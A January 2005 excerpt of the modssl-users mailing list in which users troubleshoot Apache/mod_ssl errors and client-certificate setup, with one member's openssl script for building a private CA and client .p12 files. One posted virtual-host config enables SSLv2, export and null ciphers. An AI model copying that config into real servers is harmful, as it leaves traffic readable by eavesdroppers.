          id <20050108195036.LDSM25979.tomts25-srv.bellnexxia.net@devine>
          for ; Sat, 8 Jan 2005 14:50:36 -0500
From: "Devin Tuinstra" 
To: 
Subject: 403 Forbidden from client - Seeding PRNG with 0 bytes of entropy
Date: Sat, 8 Jan 2005 14:51:51 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0004_01C4F591.961D4460"
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
Thread-Index: AcT1u37WuYnwGlwPQOmSxQP078awHA==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Message-Id: <20050108195036.LDSM25979.tomts25-srv.bellnexxia.net@devine>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Devin Tuinstra" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0004_01C4F591.961D4460
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I had a webserver running with this exact same setup recently and have moved
to a new server.

 

I am running:

Apache/2.0.52 (FreeBSD) PHP/4.3.10 mod_ssl/2.0.52 OpenSSL/0.9.7d
mod_perl/1.99_18 Perl/v5.8.5

 

I created a new csr on the new server and had a certificate re-issued from
my authority.

Now when I load up the https using the same configuration as the old
server.. I get 403 Forbidden in the browser.

 

The httpd error-log looks like this:

 

[Sat Jan 08 14:43:12 2005] [info] Connection to child 5 established (server
www.ocsd.ca:443, client 65.92.64.70)

[Sat Jan 08 14:43:12 2005] [info] Seeding PRNG with 0 bytes of entropy

[Sat Jan 08 14:43:12 2005] [debug] ssl_engine_kernel.c(1771): OpenSSL:
Handshake: start

[Sat Jan 08 14:43:12 2005] [debug] ssl_engine_kernel.c(1779): OpenSSL: Loop:
before/accept initialization

[Sat Jan 08 14:43:12 2005] [debug] ssl_engine_io.c(1506): OpenSSL: read
11/11 bytes from BIO#98d2ac0 [mem: b434000] (BIO dump foll



[Sat Jan 08 14:43:12 2005] [info] Initial (No.1) HTTPS request received for
child 5 (server www.ocsd.ca:443)

[Sat Jan 08 14:43:12 2005] [error] [client 65.92.64.70] client denied by
server configuration: /home/domains/ocsd.ca/web/

 

 

 

I've looked all over and I have a feeling that the Seeding PRNG with 0 bytes
of entropy is the problem.. but I've done everything with ssl.conf in apache
to update with SSLRandomSeed startup file:/dev/random  512    etc etc..

 

But I can't seem to get that to change.. maybe I'm overlooking something.

 

Any help would be greatly appreciated,

 

Thanks,

 

Devin

 


------=_NextPart_000_0004_01C4F591.961D4460
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


















I had a webserver running with this exact same setup
recently and have moved to a new server.



 



I am running:



Apache/2.0.52 (FreeBSD) PHP/4.3.10 mod_ssl/2.0.52
OpenSSL/0.9.7d mod_perl/1.99_18 Perl/v5.8.5



 



I created a new csr on the new server and had a =
certificate
re-issued from my authority.



Now when I load up the https using the same =
configuration as
the old server.. I get 403 Forbidden in the =
browser.



 



The httpd error-log looks like =
this:



 



[Sat Jan 08 14:43:12 2005] [info] Connection to child =
5
established (server www.ocsd.ca:443, client =
65.92.64.70)



[Sat Jan 08 14:43:12 2005] [info] Seeding PRNG with 0 =
bytes
of entropy



[Sat Jan 08 14:43:12 2005] [debug]
ssl_engine_kernel.c(1771): OpenSSL: Handshake: =
start



[Sat Jan 08 14:43:12 2005] [debug]
ssl_engine_kernel.c(1779): OpenSSL: Loop:
before/accept initialization



[Sat Jan 08 14:43:12 2005] [debug] =
ssl_engine_io.c(1506):
OpenSSL: read 11/11 bytes from BIO#98d2ac0 [mem: b434000] (BIO dump =
foll



<!—insert about 5 dumps =
-->



[Sat Jan 08 14:43:12 2005] [info] Initial (No.1) =
HTTPS
request received for child 5 (server =
www.ocsd.ca:443)



[Sat Jan 08 14:43:12 2005] [error] [client =
65.92.64.70]
client denied by server configuration: =
/home/domains/ocsd.ca/web/



 



 



 



I’ve looked all over and I have a feeling that =
the Seeding
PRNG with 0 bytes of entropy is the problem.. but I’ve done =
everything
with ssl.conf in apache to update with SSLRandomSeed startup
file:/dev/random  512    etc =
etc..



 



But I can’t seem to get that to change.. maybe =
I’m
overlooking something.



 



Any help would be greatly =
appreciated,



 



Thanks,



 



Devin



 









------=_NextPart_000_0004_01C4F591.961D4460--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 11 19:33:15 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8F3B1A8ABD; Tue, 11 Jan 2005 19:33:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from out005.verizon.net (out005pub.verizon.net [206.46.170.143])
	by master.modssl.org (Postfix) with ESMTP id BC0C4A897D
	for ; Tue, 11 Jan 2005 19:33:08 +0100 (CET)
Received: from achilles ([138.88.50.250]) by out005.verizon.net
          (InterMail vM.5.01.06.06 201-253-122-130-106-20030910) with ESMTP
          id <20050111183252.YJKV28362.out005.verizon.net@achilles>
          for ; Tue, 11 Jan 2005 12:32:52 -0600
From: "john mcnicholas" 
To: 
Subject: client certificate problems
Date: Tue, 11 Jan 2005 13:32:41 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
Thread-Index: AcT4Csmq8Skz8knKQ4+bM1GLMZ/ggwAACeUg
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-Authentication-Info: Submitted using SMTP AUTH at out005.verizon.net from [138.88.50.250] at Tue, 11 Jan 2005 12:32:52 -0600
Message-Id: <20050111183252.YJKV28362.out005.verizon.net@achilles>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "john mcnicholas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


In short I'm working on duplicating a web site locally for testing and 
I am unable to get Client certificates to work here in my lab.  

The "main/public" site is using apache 1.3.33 on OS X and is properly 
configured for client certs, but I can't get this test configuration 
to work. I am using "Apache 2.0.52" so that could be a factor.  
(if necessary, I will try to reconfigure with 1.3.33)

The client browser is IE 6.x and what is odd is when I navigate to the
"main/public" site I am prompted to select a certificate, but when
I  navigate to the "test" site IE 6.x just times out.  For that reason
I am suspicious of the apache configuration but I can't be certain.

I tried with FireFox (1.0) and it also timed out. Firefox is 
configured to "ask every time" for client cert. selection and
like IE, I am not prompted.

(I'm also suspicious as to why I can't select the client certificate 
from the IE dialog for the test site - only the certificate for the 
public site is listed.)

The virtual host configuration is listed below ("ssl.conf" was 
unchanged for 2.0.52) and the error in the ssl.log is also listed 
below.  If anyone could offer any trouble shooting tips that would 
be greatly appreciated.

Thanks for your time and assistance.

John					

//-------------------------------------------------

Additional information:

Version: Apache/2.0.52
OS:      Mac OS X 10.3.7

//-------------------------------------------------

// here is the log of the error:

[info] Initial (No.1) HTTPS request received for child 5 (server 
www.apollo.home:443)
[debug] ssl_engine_kernel.c(422): Changed client verification type will 
force renegotiation
[info] Requesting connection re-negotiation
[debug] ssl_engine_kernel.c(650): Performing full renegotiation: 
complete handshake protocol
[info] Awaiting re-negotiation handshake
[debug] ssl_engine_kernel.c(1756): OpenSSL: Handshake: start
[debug] ssl_engine_kernel.c(1764): OpenSSL: Loop: before accept 
initialization
[debug] ssl_engine_io.c(1517): OpenSSL: I/O error, 5 bytes expected to 
read on BIO#1280be0 [mem: 7f7000]
[debug] ssl_engine_kernel.c(1793): OpenSSL: Exit: error in SSLv2 read 
client hello B
[error] Re-negotiation handshake failed: Not accepted by client!?


//-------------------------------------------------

// here is the virtual host info:


     DocumentRoot "/some_directory/ssl_site"
     ServerAdmin webmaster@testing.com
     ServerName www.apollo.home
     LogLevel warn
     # LogLevel debug

     SetEnvIf User-Agent ".*MSIE.*" \
              nokeepalive ssl-unclean-shutdown \
              downgrade-1.0 force-response-1.0

     #   Per-Server Logging:

     CustomLog  logs/apollo/443.access.log "%t %h %{SSL_PROTOCOL}x 
%{SSL_CIPHER}x \"%r\" %b"

     ErrorLog   logs/apollo/443.error.log
     DirectoryIndex "index.html"
     
         #
         #  ssl stuff
         #
         SSLEngine On
         SSLProtocol all -SSLv3
         SSLCipherSuite 
"ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL"

         #
         #
         LogLevel debug
         ErrorLog "logs/apollo/ssl.log"
         SSLOptions +StdEnvVars +ExportCertData

         #----------------------------------------
         #
         # path to certificates and private key
         #
         SSLCertificateFile      
"/some_directory/openssl/servers/www.apollo.home.cert.pem"
         SSLCertificateKeyFile   
"/some_directory/openssl/servers/www.apollo.home.key.unencrypted"

         SSLCACertificateFile    
"/some_directory/openssl/private/CA-1.cert.pem"
     

     
         SSLVerifyClient require
         SSLVerifyDepth  3
     




		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 12 03:59:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 40659A8A91; Wed, 12 Jan 2005 03:59:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id 57058A8A6D
	for ; Wed, 12 Jan 2005 03:58:46 +0100 (CET)
Received: from DTALAPTOP02 (AC86F26D.ipt.aol.com [172.134.242.109]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Tue, 11 Jan 2005 21:58:24 -0500
From: "David T. Ashley" 
To: 
Subject: FW: Client Certificates (Help!)
Date: Tue, 11 Jan 2005 22:02:22 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



-----Original Message-----
From: David T. Ashley [mailto:dashley@abi-consulting.com]
Sent: Tuesday, January 11, 2005 9:57 PM
To: john mcnicholas
Subject: RE: Client Certificates (Help!)


Hi John,

The following script shows how I generated my keys and certificates.

Notice the exports to .p12.  The .p12 is sucked in by the browser (Internet
Explorer in my case).

If you have any more questions or if I've done something wrong in the script
below please write back.

The general form of the script was lifted from a web page somewhere (can't
remember which one).

Also, if you want the relevant lines from my Apache configuration file,
please write back.

Thanks, Dave.

----------

#!/bin/bash
#
echo "Generating certification authority key ..."
openssl genrsa -rand /var/log/messages -out ecollab_ca.key 2048
echo ""
#
echo "Generating certification authority certificate.  Information entered"
echo "should reflect the authority.  Organization should be E-COLLAB.COM,"
echo "and organizational unit should be CA."
openssl req -new -x509 -days 3660 -key ecollab_ca.key -out ecollab_ca.crt
echo ""
#
echo "Generating Apache webserver key ..."
openssl genrsa -rand /var/log/messages -out www_ecollab_com.key 2048
echo ""
#
echo "Generating Apache webserver key signing request.  Any information"
echo "entered should reflect the server ..."
openssl req -new -key www_ecollab_com.key -out www_ecollab_com.csr
echo ""
#
echo "Signing the apache webserver key with the certification authority"
echo "certificate."
openssl x509 -req -days 3660 -in www_ecollab_com.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out www_ecollab_com.crt
echo ""
#
echo "Generating a key for administrative web page clients."
openssl genrsa -rand /var/log/messages -out client_admin.key 2048
echo ""
#
echo "Generating a certificate signing request for administrative"
echo "client.  Any information should have an organizational unit"
echo "of \"Admin\"".
openssl req -new -key client_admin.key -out client_admin.csr
echo ""
#
echo "Signing the administrative client key with the certification
authority"
echo "key."
openssl x509 -req -days 3660 -in client_admin.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_admin.crt
echo ""
#
echo "Exporting the Admin client certificate/key in a form usable by
browsers."
#openssl x509 -in client_admin.crt -text
openssl pkcs12 -export -clcerts -in client_admin.crt -inkey
client_admin.key -out client_admin.p12
echo ""
#
echo "Generating a key for Cequent web page clients."
openssl genrsa -rand /var/log/messages -out client_cequent.key 2048
echo ""
#
echo "Generating a certificate signing request for Cequent"
echo "client.  Any information should have an organizational unit"
echo "of \"Cequent\"".
openssl req -new -key client_cequent.key -out client_cequent.csr
echo ""
#
echo "Signing the Cequent client key with the certification authority"
echo "key."
openssl x509 -req -days 3660 -in client_cequent.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_cequent.crt
echo ""
#
echo "Exporting the Cequent client certificate/key in a form usable by
browsers."
#openssl x509 -in client_cequent.crt -text
openssl pkcs12 -export -clcerts -in client_cequent.crt -inkey
client_cequent.key -out client_cequent.p12
echo ""
#
echo "Generating a key for Ford web page clients."
openssl genrsa -rand /var/log/messages -out client_ford.key 2048
echo ""
#
echo "Generating a certificate signing request for Ford"
echo "client.  Any information should have an organizational unit"
echo "of \"Ford\"".
openssl req -new -key client_ford.key -out client_ford.csr
echo ""
#
echo "Signing the Ford client key with the certification authority"
echo "key."
openssl x509 -req -days 3660 -in client_ford.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_ford.crt
echo ""
#
echo "Exporting the Ford client certificate/key in a form usable by
browsers."
#openssl x509 -in client_cequent.crt -text
openssl pkcs12 -export -clcerts -in client_ford.crt -inkey
client_ford.key -out client_ford.p12
echo ""
#
#End of script.


> -----Original Message-----
> From: john mcnicholas [mailto:jomcn@mail.com]
> Sent: Tuesday, January 11, 2005 7:45 PM
> To: dashley@abi-consulting.com
> Subject: Re: Client Certificates (Help!)
>
>
> Hi Dave,
>
> I hope you don't mind me writing to you directly, but I was hoping you
> could give some details as to how you solved your problem.
>
> I am currently struggling to get the client certificates to work using
> apache2 on OS X, and I believe one of my problems is the format of the
> client certificate so I'm curious  to hear your solution.  (plus any
> advice you might have)
>
> Again sorry to bother you, but I've been spinning my wheels for a while
> now.  Thanks for your time.
>
> John
>
> //----------------------------------------------------------
>
> Hi Mr. Waters,
>
> I got it all straightened out.  I had just not converted to the right
> key/certificate format, etc.
>
> Did, however, run into a bug where Apache won't support POST with client
> authentication.  I've been advised to downgrade Apache.
>
> Dave.
>
>  > -----Original Message-----
>  > From: owner-modssl-users@modssl.org
>  > [mailto:owner-modssl-users@modssl.org]On Behalf Of P Larkin Waters
>  > Sent: Tuesday, January 04, 2005 6:11 AM
>  > To: modssl-users@modssl.org
>  > Subject: Re: Client Certificates (Help!)
>  >
>  >
>  > did you use a real certificate?
>  > if you used a test certificate did you install the test certificate
>  > authority?
>  > I'm sure you know that test certificates don't work with the CA's that
>  > come preinstalled in most browsers.
>  >
>  > ____
>  > Theory is when you know something, but it doesn't work.
>  > Practice is when something works, but you don't know why.
>  > Programmers combine theory and practice:
>  > Nothing works and they don't know why.
>  > --Unknown
>  > ----- Original Message -----
>  > From: "David T. Ashley" 
>  > To: 
>  > Sent: Tuesday, December 21, 2004 7:29 PM
>  > Subject: Client Certificates (Help!)
>  >
>  >
>  > > Hi,
>  > >
>  > > Does anyone have any good URLs or instructions about how to create
>  > client
>  > > certificates for browsers so that only browsers with the certificate
>  > can
>  > > connect to the server (or view certain directories on the server)?
>  > >
>  > > I tried one procedure I found on the web, and it ended up with
> Apache
>  > > complaining about the keys and certificates it had.  The best I
> could
>  > do
>  > > myself was a self-signed SSL certificate (which worked fine), but
> the
>  > client
>  > > certificates didn't work out.
>  > >
>  > > I'll try any procedures anyone supplies, and if that doesn't work
> I'll
>  > post
>  > > detailed information about what I tried and what went wrong.
>  > >
>  > > The site, by the way, is www.e-collab.com.  The self-signed SSL
>  > certificate
>  > > for Apache worked fine.  It was just the more advanced stuff that
>  > eluded me.
>  > >
>  > > Thanks a lot!
>  > >
>  > > Merry Christmas!
>  > >
>  > > Dave Ashley.
>  > >
>  > >
> ______________________________________________________________________
>  > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
>  > > User Support Mailing List
> modssl-users@modssl.org
>  > > Automated List Manager
> majordomo@modssl.org
>  > >
>  >
>  > ______________________________________________________________________
>  > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>  > User Support Mailing List                      modssl-users@modssl.org
>  > Automated List Manager                            majordomo@modssl.org
>  >
>  >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 12 05:17:02 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C5A7EA8ACF; Wed, 12 Jan 2005 05:17:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id 0CBCCA8AA5
	for ; Wed, 12 Jan 2005 05:16:57 +0100 (CET)
Received: from DTALAPTOP02 (AC8CF1DF.ipt.aol.com [172.140.241.223]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Tue, 11 Jan 2005 23:16:40 -0500
From: "David T. Ashley" 
To: 
Subject: FW: Client Certificates (Help!)
Date: Tue, 11 Jan 2005 23:20:38 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi John,

One more thing (and I may get flamed wasting everyone's time by sending this
to the list).

I tried to communicate with you directly by e-mail, but your mail server
rejected my mail as part of an anti-spam policy.  The list was the only way
I had to respond to your e-mail.

So, if you need additional info, please post the question to the list (and
maybe copy me as well by e-mail), and I'll just post to the list.  I don't
have a way to get mail directly to you.

Thanks, Dave.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of David T. Ashley
Sent: Tuesday, January 11, 2005 10:02 PM
To: modssl-users@modssl.org
Subject: FW: Client Certificates (Help!)




-----Original Message-----
From: David T. Ashley [mailto:dashley@abi-consulting.com]
Sent: Tuesday, January 11, 2005 9:57 PM
To: john mcnicholas
Subject: RE: Client Certificates (Help!)


Hi John,

The following script shows how I generated my keys and certificates.

Notice the exports to .p12.  The .p12 is sucked in by the browser (Internet
Explorer in my case).

If you have any more questions or if I've done something wrong in the script
below please write back.

The general form of the script was lifted from a web page somewhere (can't
remember which one).

Also, if you want the relevant lines from my Apache configuration file,
please write back.

Thanks, Dave.

----------

#!/bin/bash
#
echo "Generating certification authority key ..."
openssl genrsa -rand /var/log/messages -out ecollab_ca.key 2048
echo ""
#
echo "Generating certification authority certificate.  Information entered"
echo "should reflect the authority.  Organization should be E-COLLAB.COM,"
echo "and organizational unit should be CA."
openssl req -new -x509 -days 3660 -key ecollab_ca.key -out ecollab_ca.crt
echo ""
#
echo "Generating Apache webserver key ..."
openssl genrsa -rand /var/log/messages -out www_ecollab_com.key 2048
echo ""
#
echo "Generating Apache webserver key signing request.  Any information"
echo "entered should reflect the server ..."
openssl req -new -key www_ecollab_com.key -out www_ecollab_com.csr
echo ""
#
echo "Signing the apache webserver key with the certification authority"
echo "certificate."
openssl x509 -req -days 3660 -in www_ecollab_com.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out www_ecollab_com.crt
echo ""
#
echo "Generating a key for administrative web page clients."
openssl genrsa -rand /var/log/messages -out client_admin.key 2048
echo ""
#
echo "Generating a certificate signing request for administrative"
echo "client.  Any information should have an organizational unit"
echo "of \"Admin\"".
openssl req -new -key client_admin.key -out client_admin.csr
echo ""
#
echo "Signing the administrative client key with the certification
authority"
echo "key."
openssl x509 -req -days 3660 -in client_admin.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_admin.crt
echo ""
#
echo "Exporting the Admin client certificate/key in a form usable by
browsers."
#openssl x509 -in client_admin.crt -text
openssl pkcs12 -export -clcerts -in client_admin.crt -inkey
client_admin.key -out client_admin.p12
echo ""
#
echo "Generating a key for Cequent web page clients."
openssl genrsa -rand /var/log/messages -out client_cequent.key 2048
echo ""
#
echo "Generating a certificate signing request for Cequent"
echo "client.  Any information should have an organizational unit"
echo "of \"Cequent\"".
openssl req -new -key client_cequent.key -out client_cequent.csr
echo ""
#
echo "Signing the Cequent client key with the certification authority"
echo "key."
openssl x509 -req -days 3660 -in client_cequent.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_cequent.crt
echo ""
#
echo "Exporting the Cequent client certificate/key in a form usable by
browsers."
#openssl x509 -in client_cequent.crt -text
openssl pkcs12 -export -clcerts -in client_cequent.crt -inkey
client_cequent.key -out client_cequent.p12
echo ""
#
echo "Generating a key for Ford web page clients."
openssl genrsa -rand /var/log/messages -out client_ford.key 2048
echo ""
#
echo "Generating a certificate signing request for Ford"
echo "client.  Any information should have an organizational unit"
echo "of \"Ford\"".
openssl req -new -key client_ford.key -out client_ford.csr
echo ""
#
echo "Signing the Ford client key with the certification authority"
echo "key."
openssl x509 -req -days 3660 -in client_ford.csr -CA ecollab_ca.crt \
             -CAkey ecollab_ca.key -CAcreateserial -out client_ford.crt
echo ""
#
echo "Exporting the Ford client certificate/key in a form usable by
browsers."
#openssl x509 -in client_cequent.crt -text
openssl pkcs12 -export -clcerts -in client_ford.crt -inkey
client_ford.key -out client_ford.p12
echo ""
#
#End of script.


> -----Original Message-----
> From: john mcnicholas [mailto:jomcn@mail.com]
> Sent: Tuesday, January 11, 2005 7:45 PM
> To: dashley@abi-consulting.com
> Subject: Re: Client Certificates (Help!)
>
>
> Hi Dave,
>
> I hope you don't mind me writing to you directly, but I was hoping you
> could give some details as to how you solved your problem.
>
> I am currently struggling to get the client certificates to work using
> apache2 on OS X, and I believe one of my problems is the format of the
> client certificate so I'm curious  to hear your solution.  (plus any
> advice you might have)
>
> Again sorry to bother you, but I've been spinning my wheels for a while
> now.  Thanks for your time.
>
> John
>
> //----------------------------------------------------------
>
> Hi Mr. Waters,
>
> I got it all straightened out.  I had just not converted to the right
> key/certificate format, etc.
>
> Did, however, run into a bug where Apache won't support POST with client
> authentication.  I've been advised to downgrade Apache.
>
> Dave.
>
>  > -----Original Message-----
>  > From: owner-modssl-users@modssl.org
>  > [mailto:owner-modssl-users@modssl.org]On Behalf Of P Larkin Waters
>  > Sent: Tuesday, January 04, 2005 6:11 AM
>  > To: modssl-users@modssl.org
>  > Subject: Re: Client Certificates (Help!)
>  >
>  >
>  > did you use a real certificate?
>  > if you used a test certificate did you install the test certificate
>  > authority?
>  > I'm sure you know that test certificates don't work with the CA's that
>  > come preinstalled in most browsers.
>  >
>  > ____
>  > Theory is when you know something, but it doesn't work.
>  > Practice is when something works, but you don't know why.
>  > Programmers combine theory and practice:
>  > Nothing works and they don't know why.
>  > --Unknown
>  > ----- Original Message -----
>  > From: "David T. Ashley" 
>  > To: 
>  > Sent: Tuesday, December 21, 2004 7:29 PM
>  > Subject: Client Certificates (Help!)
>  >
>  >
>  > > Hi,
>  > >
>  > > Does anyone have any good URLs or instructions about how to create
>  > client
>  > > certificates for browsers so that only browsers with the certificate
>  > can
>  > > connect to the server (or view certain directories on the server)?
>  > >
>  > > I tried one procedure I found on the web, and it ended up with
> Apache
>  > > complaining about the keys and certificates it had.  The best I
> could
>  > do
>  > > myself was a self-signed SSL certificate (which worked fine), but
> the
>  > client
>  > > certificates didn't work out.
>  > >
>  > > I'll try any procedures anyone supplies, and if that doesn't work
> I'll
>  > post
>  > > detailed information about what I tried and what went wrong.
>  > >
>  > > The site, by the way, is www.e-collab.com.  The self-signed SSL
>  > certificate
>  > > for Apache worked fine.  It was just the more advanced stuff that
>  > eluded me.
>  > >
>  > > Thanks a lot!
>  > >
>  > > Merry Christmas!
>  > >
>  > > Dave Ashley.
>  > >
>  > >
> ______________________________________________________________________
>  > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
>  > > User Support Mailing List
> modssl-users@modssl.org
>  > > Automated List Manager
> majordomo@modssl.org
>  > >
>  >
>  > ______________________________________________________________________
>  > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>  > User Support Mailing List                      modssl-users@modssl.org
>  > Automated List Manager                            majordomo@modssl.org
>  >
>  >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 12 23:25:26 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 13F6EA8ACF; Wed, 12 Jan 2005 23:25:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nwc.com (mail.nwc.com [128.230.97.51])
	by master.modssl.org (Postfix) with ESMTP id 6B55BA8ABB
	for ; Wed, 12 Jan 2005 23:25:18 +0100 (CET)
X-SpamCatcher-Score:   2 [X]
Received: from [129.44.206.83] (account mfratto HELO bitchin)
  by nwc.com (CommuniGate Pro SMTP 4.2.8)
  with ESMTP-TLS id 4071479 for modssl-users@modssl.org; Wed, 12 Jan 2005 17:24:55 -0500
From: "Mike Fratto" 
To: 
Subject: RE: Enable/disable SSL in virutal hosts
Date: Wed, 12 Jan 2005 17:24:54 -0500
Message-ID: <00aa01c4f8f5$8ae9a360$0b1f10ac@bitchin>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Fratto" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>Hi Mike,
>
>Thanks for the information.  You've provided more information than most 
>posters, including corroboration that the server is reading the 
>configuration file.

Dave, thanks for responding. Actually, about 20 minutes after I posted the
request for help, I realized that if I defined a directory in the virtual
host for port 80, and and denied access to SSL connection, it worked.

Now to find out why I am not getting email from this list. Grrr.

mike

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 14 17:19:11 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C356DA8A85; Fri, 14 Jan 2005 17:19:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mlnyb905er.ml.com (mlnyb905er.ml.com [199.43.54.103])
	by master.modssl.org (Postfix) with ESMTP id F092DA8933
	for ; Fri, 14 Jan 2005 17:19:06 +0100 (CET)
Received: from MLNYB856BH.amrs.win.ml.com (unknown [146.125.94.134])
	by mlnyb905er.ml.com (Postfix) with ESMTP id 353CEE02A681
	for ; Fri, 14 Jan 2005 11:18:51 -0500 (EST)
Received: from mlnyb803bh.amrs.win.ml.com ([146.125.97.62]) by MLNYB856BH.amrs.win.ml.com with Microsoft SMTPSVC(5.0.2195.6713); Fri, 14 Jan 2005 11:18:51 -0500
Received: from mlnyb704mb.amrs.win.ml.com ([146.125.92.4]) by mlnyb803bh.amrs.win.ml.com with Microsoft SMTPSVC(5.0.2195.6713); Fri, 14 Jan 2005 11:18:50 -0500
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Content-Class: urn:content-classes:message
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C4FA54.9D5F4000"
Subject: Domain Name Mismatch
Date: Fri, 14 Jan 2005 11:17:59 -0500
Importance: normal
